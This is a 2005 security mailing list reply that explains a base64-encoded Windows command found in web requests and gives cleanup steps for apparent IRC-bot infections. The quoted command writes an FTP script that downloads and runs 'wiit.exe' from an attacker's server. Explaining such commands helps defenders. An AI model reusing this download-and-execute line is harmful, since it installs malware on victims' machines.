[Dshield] Anyone seen wiit.exe?

jayjwa jayjwa at atr2.ath.cx
Tue Aug 30 07:42:55 GMT 2005

On Mon, 29 Aug 2005, bgreenwood wrote:

-> Over about the past two weeks or so I have noticed the following
being base64 encoded in the URI of some incoming requests to my site...

Are you running IIS, by chance?

-> cmd /k echo open 17113 > o&echo user 1 1 >> o &echo
get wiit.exe >> o &echo quit >> o &ftp -n -s:o &del /F /Q o &wiit.exe

This command is calling the interpreter to create an ftp script that is
then fed into into ftp.exe. Script "o" Looks like this:

open 17113
user 1 1
get wiit.exe

That script that downloads from the attacker, in this case
at port 17113, from a bot ftp server the bot binary, in this case
"wiit.exe". The last command feeds the script to ftp.exe, quitely deletes 
it, and runs it.

ftp -n -s:o     downloads it
& del /F /Q o   deletes it
& wiit.exe      runs what just got downloaded

-> I have seen this activity before but with different filenames being
called out.  I don't recall seeing the wiit.exe or know exactly what
it is supposed to be doing. Has anyone seen this or know what
it is supposed to be doing once executed?

Check in

C:\Windows\System32  (depending on the case of the OS)

and another reference to the file in HKLM of the registry, Run, RunOnce 
and/or RunServices. There's a few others on some.

These are the download & exec commands that are sent from the attacking 
machine to the new victim machine once successful exploitation has 
occured. You more than likely have alot of irc-bot infected machines 
and/or a totally compromised network, depending on how many of your 
machines are doing this/taking these requests. Someone is then sitting in 
an IRC channel somewhere, using these machines to DDoS, send SPAM, infect 
other people's machines, harvest emails, Windows CD keys, run SOCKS4/5 
proxies, etc.

Note where the machines are connecting to. Record the IP, whois and 
contact point for the host(s) in question.

Shutdown the machine, boot from a clean disk to safemode or another OS 
like linux and mount the disk (that is, do not let the Registery stuff 
execute, as little as possible should run. If the process does start that 
you think is the bot, task kill it.) Remove the referenced file. Remove 
all mentions of the file from the registery. Make sure that "System 
Restore" is diabled during this. You might need to repair the hosts file. 
Patch the system, firewall off the known bot/exploit ports, and IMHO 
swap IIS for Apache and restart. Repeat for each machine.

Mail the contact point for the server you recorded and tell him about his 
botnet. If you're feeling adventuresome, follow the path of the bots back 
to the server and see if you can get into the bot channel and learn 
anything about the botmaster.


More information about the list mailing list